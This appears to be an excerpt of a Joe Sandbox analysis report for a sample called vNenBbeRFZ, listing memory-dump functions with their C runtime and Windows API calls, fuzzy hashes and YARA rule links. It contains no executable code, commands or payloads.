Opcode Fuzzy Hash: 392fba3fb3d9d608cc926a53832d434791d2b063994b97974049bb4d13b2cc6d
Instruction Fuzzy Hash: D951BF76900219BFEF01EFA4DC84EFE7B7CEF49360F144465F615AA1A0D7309A058B60

Function 03D74271 Relevance: 6.1, APIs: 4, Instructions: 143COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F52
Part of subcall function 03D76F4C: _malloc.LIBCMT ref: 03D76F62

Part of subcall function 03D862E8: __fsopen.LIBCMT ref: 03D862F5

_fseek.LIBCMT ref: 03D742E7

Part of subcall function 03D86922: __lock_file.LIBCMT ref: 03D86931
Part of subcall function 03D86922: __ftelli64_nolock.LIBCMT ref: 03D8693E

_fseek.LIBCMT ref: 03D74300

Part of subcall function 03D86CB3: __lock_file.LIBCMT ref: 03D86CFE
Part of subcall function 03D86CB3: __fseek_nolock.LIBCMT ref: 03D86D0E

GetFullPathNameA.KERNEL32(03D9E70C,00000800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,03D7156B), ref: 03D7432D
_malloc.LIBCMT ref: 03D74347

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
String ID:
API String ID: 73014519-0
Opcode ID: 701fce8de3ec9bb1d9360bcc41795b708e00b1cf1f8a4ab8ba9837200dd61b40
Instruction ID: bc875b0ff9c6228ab6a252bb3adaf1a81e43e3b184cad79579fbf143bf365365
Opcode Fuzzy Hash: 701fce8de3ec9bb1d9360bcc41795b708e00b1cf1f8a4ab8ba9837200dd61b40
Instruction Fuzzy Hash: F641B3B6C00308ABCF11FBA5DC81F9EBBB8EF08710F144526E558AA290FA75D6558B70

Function 03D862FF Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE

Download Yara Rule

APIs

__flush.LIBCMT ref: 03D863C3
__fileno.LIBCMT ref: 03D863E3
__locking.LIBCMT ref: 03D863EA
__flsbuf.LIBCMT ref: 03D86415

Part of subcall function 03D8747A: __getptd_noexit.LIBCMT ref: 03D8747A

Part of subcall function 03D895C5: __decode_pointer.LIBCMT ref: 03D895D0

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: f8710533abc2f5b3fb5f147849a2464613c1c5199b2b5e83875a7d4d8df38b9b
Instruction ID: 3bc68dad50b7adcac3ea535261001c3a14214b165e463b6dbe76c9e2e940afc0
Opcode Fuzzy Hash: f8710533abc2f5b3fb5f147849a2464613c1c5199b2b5e83875a7d4d8df38b9b
Instruction Fuzzy Hash: D941C471E00708EBDB24EF69C98499EF7B6EF80B70F2C8169E5659B150E770FA418B50

Function 03D7AD62 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D7AD79

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

_memset.LIBCMT ref: 03D7AD8A

Part of subcall function 03D7BC8C: _malloc.LIBCMT ref: 03D7BCB3
Part of subcall function 03D7BC8C: _memset.LIBCMT ref: 03D7BCE1

_memset.LIBCMT ref: 03D7AE97

Part of subcall function 03D77023: htons.WS2_32(?), ref: 03D7703B

_malloc.LIBCMT ref: 03D7AE13

Part of subcall function 03D7BC8C: _realloc.LIBCMT ref: 03D7BCC2

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc_memset$AllocateHeap_reallochtons
String ID:
API String ID: 1081130088-0
Opcode ID: 6b1211aa5d9d5d7dbfff121c54e00359bd1c0e2af8c2c36a347afa023b093e1f
Instruction ID: 6e57a6fdb1e88c2dbb10fb2319546a06c01662c00dd382389d47e0ff917d39af
Opcode Fuzzy Hash: 6b1211aa5d9d5d7dbfff121c54e00359bd1c0e2af8c2c36a347afa023b093e1f
Instruction Fuzzy Hash: 2731C2769147406AD620FA64AC85FABB2EDEB45B11F00081FF1549B2C0FAA4E85482B5

Function 0397A1B0 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0397A1C7

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_memset.LIBCMT ref: 0397A1D8
_malloc.LIBCMT ref: 0397A261
_memset.LIBCMT ref: 0397A2E5

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc_memset
String ID:
API String ID: 4137368368-0
Opcode ID: e95d45cf03e9dace8ee17f7f3b5eddb95500a42064f360721c05de80dc074fe9
Instruction ID: c307f266691672974a900f8ff6fce20889455baf7d0d90e8d8d0c20dd82b17be
Opcode Fuzzy Hash: e95d45cf03e9dace8ee17f7f3b5eddb95500a42064f360721c05de80dc074fe9
Instruction Fuzzy Hash: 383101765047106AE325FB649CC5FABB3ECEBC4B10F14082FF681DF2D1EA65A8408365

Function 03D761B0 Relevance: 6.1, APIs: 4, Instructions: 106sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D761CA
_memset.LIBCMT ref: 03D761E2

Part of subcall function 03D77023: htons.WS2_32(?), ref: 03D7703B

Part of subcall function 03D7610D: GetLastError.KERNEL32(00000000,00000000,?,03D7626B,?), ref: 03D76127

Sleep.KERNEL32(000001F4), ref: 03D76275
GetLastError.KERNEL32 ref: 03D76281

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ErrorLast_memset$Sleephtons
String ID:
API String ID: 2264653377-0
Opcode ID: e1cc88bba242e9c8a69b9640af8ae62b82d9ffd0b3b2b082c2804845ae17f3f7
Instruction ID: 4d3ebdbe691173c7f5e0582e992f9a59c03d9fc06f8c0557dc942d74077ce34b
Opcode Fuzzy Hash: e1cc88bba242e9c8a69b9640af8ae62b82d9ffd0b3b2b082c2804845ae17f3f7
Instruction Fuzzy Hash: 9E319E7B9043196EDF11EBA4DC41EEEB7BCEF05654F14006AE644BA081FA35EA188B70

Function 03D90498 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03D904CC
__isleadbyte_l.LIBCMT ref: 03D90500
MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,53DC458D,03D9E5C0,00000000,?,?,?,03D7AB5C,00000000,03D9E5C0,00000000), ref: 03D90531
MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,00000001,03D9E5C0,00000000,?,?,?,03D7AB5C,00000000,03D9E5C0,00000000), ref: 03D9059F

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5ef9e691a91ce5c745edc1bc9c0a020b536e8e468d96a474f0a581fa2618ad4d
Instruction ID: aa919d8ac0f4af8ded684367759178165ab657b56df09877a610148b37761298
Opcode Fuzzy Hash: 5ef9e691a91ce5c745edc1bc9c0a020b536e8e468d96a474f0a581fa2618ad4d
Instruction Fuzzy Hash: 9C31C371A01255EFEF20EFB4E8849BE7BA9FF01710F1985AAE4A59B191D330D940DB50

Function 03D74F57 Relevance: 6.1, APIs: 4, Instructions: 92sleeppipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D74F72
CreatePipe.KERNEL32(?,00000000,?,00100000,?,00000000), ref: 03D74FA9
GetStartupInfoA.KERNEL32(?), ref: 03D74FB3
Sleep.KERNEL32(00000064,?,?,?,?,?,00000000), ref: 03D74FEF

Part of subcall function 03D76165: GetTickCount.KERNEL32 ref: 03D76177
Part of subcall function 03D76165: GetTickCount.KERNEL32 ref: 03D761A5

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup_memset
String ID:
API String ID: 2883758626-0
Opcode ID: 43af45b08d6801388708b5232de9de0443d54d79d2c64c074d52825796ec4110
Instruction ID: d1c069ff5ee84963a0e35ec75247728cf187f141632f1a0fcecdfe94ad5834de
Opcode Fuzzy Hash: 43af45b08d6801388708b5232de9de0443d54d79d2c64c074d52825796ec4110
Instruction Fuzzy Hash: 1A310C76C0020DAFDF11EFA4DC49ADEBBB9EF09314F140116FA04BA150EB7296659BA1

Function 03D72FBD Relevance: 6.1, APIs: 4, Instructions: 72synchronizationpipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D72FD0
CreatePipe.KERNEL32(00000000,00000002,?,00100000,?,00000000,00002000), ref: 03D73006
GetStartupInfoA.KERNEL32(?), ref: 03D73010
WaitForSingleObject.KERNEL32(?,00002710,?,?,?,?,?,?,?,00000000,00002000), ref: 03D73054

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CreateInfoObjectPipeSingleStartupWait_memset
String ID:
API String ID: 468459245-0
Opcode ID: f77d882416debb2f371c5d634ce13caeb3b2d19eb373b48dc1a1d78f570624a3
Instruction ID: 699f544f4c9931c4094ac7b994ff863fde9740d3957ca814f93593a420ad7482
Opcode Fuzzy Hash: f77d882416debb2f371c5d634ce13caeb3b2d19eb373b48dc1a1d78f570624a3
Instruction Fuzzy Hash: A4212972D00218BADF11DFE8CD45ADEBBB9FF49700F10045AEA04F6240E771AA159BA1

Function 03D7113A Relevance: 6.1, APIs: 4, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D7114F

Part of subcall function 03D858CD: __FF_MSGBANNER.LIBCMT ref: 03D858F0
Part of subcall function 03D858CD: __NMSG_WRITE.LIBCMT ref: 03D858F7
Part of subcall function 03D858CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE), ref: 03D85944

Part of subcall function 03D749B1: ExpandEnvironmentStringsA.KERNEL32(03D7AFFC,00000000,00000000,03D78ED8,00000100,?,03D7AFD4,?,03D7AFFC,00000100,?,?,?,?,?,03D78ED8), ref: 03D749C3

_memset.LIBCMT ref: 03D711A4
_memset.LIBCMT ref: 03D711B3
_memset.LIBCMT ref: 03D711CA

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
String ID:
API String ID: 2041733451-0
Opcode ID: f7572a3c0da8798afcf66ba79f1ea1c732b69a6bac77787d3c6fa841622c2c25
Instruction ID: 4e23f10c2ebaad6d9ff7073e7e425cb35db43e60139e70969ba4027fad80e225
Opcode Fuzzy Hash: f7572a3c0da8798afcf66ba79f1ea1c732b69a6bac77787d3c6fa841622c2c25
Instruction Fuzzy Hash: 96112B75600241BAD721EF748C80FB6BB7EDF43154F140295EC599B282F332AA08C6B4

Function 03970588 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0397059D

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_memset.LIBCMT ref: 039705F2
_memset.LIBCMT ref: 03970601
_memset.LIBCMT ref: 03970618

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$_malloc
String ID:
API String ID: 3506388080-0
Opcode ID: cbb59a0485ab383cf776bce1adb0dca5ef97c1db617738dd29db20958ba5a44c
Instruction ID: 331a1fc993760f49e9042e6d5ed6bfb7537aacf2955d136849f098b9c1874b36
Opcode Fuzzy Hash: cbb59a0485ab383cf776bce1adb0dca5ef97c1db617738dd29db20958ba5a44c
Instruction Fuzzy Hash: A61108B5500245AAD711EB758C80EB7BF6EDF821A0F140195E989DB382E2229D15D7A0

Function 03D7B1B3 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03D7B1D5
_strncpy.LIBCMT ref: 03D7B1F5
_strtok.LIBCMT ref: 03D7B20D
_strtok.LIBCMT ref: 03D7B22D

Part of subcall function 03D86EBD: __getptd.LIBCMT ref: 03D86EDB

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd_malloc_strncpy
String ID:
API String ID: 4272429445-0
Opcode ID: f9e560d4db8a29b0bca3fa6378317d3963b22ad7a017cbb223e21e827ad5dae2
Instruction ID: b2342b10e7b12ad1501c15ba1037881dd4fe38aabf76748a5ab4d638f9b9e1a7
Opcode Fuzzy Hash: f9e560d4db8a29b0bca3fa6378317d3963b22ad7a017cbb223e21e827ad5dae2
Instruction Fuzzy Hash: 2A110337504B45DEDB15FF34E954A663BA4EB02364F00425AD856CB385FB72D609CB90

Function 0397A601 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0397A623
_strncpy.LIBCMT ref: 0397A643
_strtok.LIBCMT ref: 0397A65B
_strtok.LIBCMT ref: 0397A67B

Part of subcall function 0398630B: __getptd.LIBCMT ref: 03986329

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd_malloc_strncpy
String ID:
API String ID: 4272429445-0
Opcode ID: 3267caea10cd6831e3035c7a646b424a490899b19bada16c0031096b734d0b27
Instruction ID: 790e2bc7b329f4cfa85beaddb6baed62567e1e3f839de3326d7072faeba445e1
Opcode Fuzzy Hash: 3267caea10cd6831e3035c7a646b424a490899b19bada16c0031096b734d0b27
Instruction Fuzzy Hash: 3011E1754043619FE726FF34DC9866A3BA9EB42364B004159D446CF3E2EF769549CF40

Function 03D7AEA6 Relevance: 6.1, APIs: 4, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D7AF08
_memset.LIBCMT ref: 03D7AF1C
_memset.LIBCMT ref: 03D7AF2D
_memset.LIBCMT ref: 03D7AF36

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 2c03c1d1c8ede8a2dd0a1348f5f34912fb353e65b94b390d7ebff38492e38ba0
Instruction ID: b8f5042c0986105a7d7b22c90d8d2e185c9e008e6a3241b1127c5b9994fead40
Opcode Fuzzy Hash: 2c03c1d1c8ede8a2dd0a1348f5f34912fb353e65b94b390d7ebff38492e38ba0
Instruction Fuzzy Hash: 3F01C4B6A00305BBCB20FB759C80DAFBBADEF496A4B044421F5088E281F675E941C7B1

Function 0397A2F4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0397A356
_memset.LIBCMT ref: 0397A36A
_memset.LIBCMT ref: 0397A37B
_memset.LIBCMT ref: 0397A384

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: b9c8251fb0aba12eca4da9ea4f53e42c9333e308029381a33883d857467e21df
Instruction ID: a18975981a32ef99c52488f5ba694253c60e3738a79f03df163ffaddad580d4f
Opcode Fuzzy Hash: b9c8251fb0aba12eca4da9ea4f53e42c9333e308029381a33883d857467e21df
Instruction Fuzzy Hash: 5001A175500318BFEB21BF658C80CAF7B5DEB866A0F044421F9088E281D67AC8419AB1

Function 03989A23 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 03989A40
__lock.LIBCMT ref: 03989A9B
__lock.LIBCMT ref: 03989ABC
___addlocaleref.LIBCMT ref: 03989ADA

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
String ID:
API String ID: 1628550938-0
Opcode ID: 0e4aec7d6b7209eb2d750185771418bc14d860442357e3507647edf2cd9d6838
Instruction ID: d72c21b813a8d5a7e8626eae3c78317dddba2930341d62f43690ef9f5f3ff036
Opcode Fuzzy Hash: 0e4aec7d6b7209eb2d750185771418bc14d860442357e3507647edf2cd9d6838
Instruction Fuzzy Hash: 8811AF79806B01EFE720FF79D840B9ABBE4EF84314F60451EE59A9B2A0CB749641CF11

Function 03D7C111 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_clock.LIBCMT ref: 03D7C12D
_clock.LIBCMT ref: 03D7C13B
_clock.LIBCMT ref: 03D7C145
_clock.LIBCMT ref: 03D7C153

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _clock
String ID:
API String ID: 876827150-0
Opcode ID: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction ID: b608d39528c5439169b9ce6c62fb75cacdcc0c1c1c4c6f5ec80bcd2fdb629d34
Opcode Fuzzy Hash: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction Fuzzy Hash: E3014079E10719EF9F11EFE8D4C05ADBBB4EB01650F1440BADD41A7200F6308A48CBA0

Function 0397B55F Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_clock.LIBCMT ref: 0397B57B
_clock.LIBCMT ref: 0397B589
_clock.LIBCMT ref: 0397B593
_clock.LIBCMT ref: 0397B5A1

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _clock
String ID:
API String ID: 876827150-0
Opcode ID: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction ID: 5755bbe8ffbd70d9a8f70af7a2ac936683878d3113ee4bcb6a8a5a600889dbd5
Opcode Fuzzy Hash: 514df1bab53789969e246ff6764c4b2c043e061879ba936f3c6b9a6bb24dfa78
Instruction Fuzzy Hash: 2F015E31E04319EFCF11DFEAD4845AEBBB8EF853C0F1584ABD411AA180D6708A44CBA0

Function 03D7B118 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

_strtok.LIBCMT ref: 03D7B12D

Part of subcall function 03D86EBD: __getptd.LIBCMT ref: 03D86EDB

Part of subcall function 03D857F0: __lock.LIBCMT ref: 03D8580E
Part of subcall function 03D857F0: ___sbh_find_block.LIBCMT ref: 03D85819
Part of subcall function 03D857F0: ___sbh_free_block.LIBCMT ref: 03D85828
Part of subcall function 03D857F0: HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
Part of subcall function 03D857F0: GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

_malloc.LIBCMT ref: 03D7B156
_strncpy.LIBCMT ref: 03D7B176
_strtok.LIBCMT ref: 03D7B182

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__getptd__lock_malloc_strncpy
String ID:
API String ID: 1160209254-0
Opcode ID: ea7cde7659b318dda21403b61c3374733c22661fe9fe843cb248ab2cc6595ed2
Instruction ID: ed3fd3d46d9cc9f4ffb94a5c7b6fcf2eae1b38c3bd3d2b538d4a7b0f6170803f
Opcode Fuzzy Hash: ea7cde7659b318dda21403b61c3374733c22661fe9fe843cb248ab2cc6595ed2
Instruction Fuzzy Hash: E701493B5046417ACB09FF28EC48E723F69DB46664B18016EFD898F211EE72E549C6A0

Function 0397A566 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0397A57B

Part of subcall function 0398630B: __getptd.LIBCMT ref: 03986329

Part of subcall function 03984C3E: __lock.LIBCMT ref: 03984C5C
Part of subcall function 03984C3E: ___sbh_find_block.LIBCMT ref: 03984C67
Part of subcall function 03984C3E: ___sbh_free_block.LIBCMT ref: 03984C76

_malloc.LIBCMT ref: 0397A5A4
_strncpy.LIBCMT ref: 0397A5C4
_strtok.LIBCMT ref: 0397A5D0

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _strtok$___sbh_find_block___sbh_free_block__getptd__lock_malloc_strncpy
String ID:
API String ID: 4231573641-0
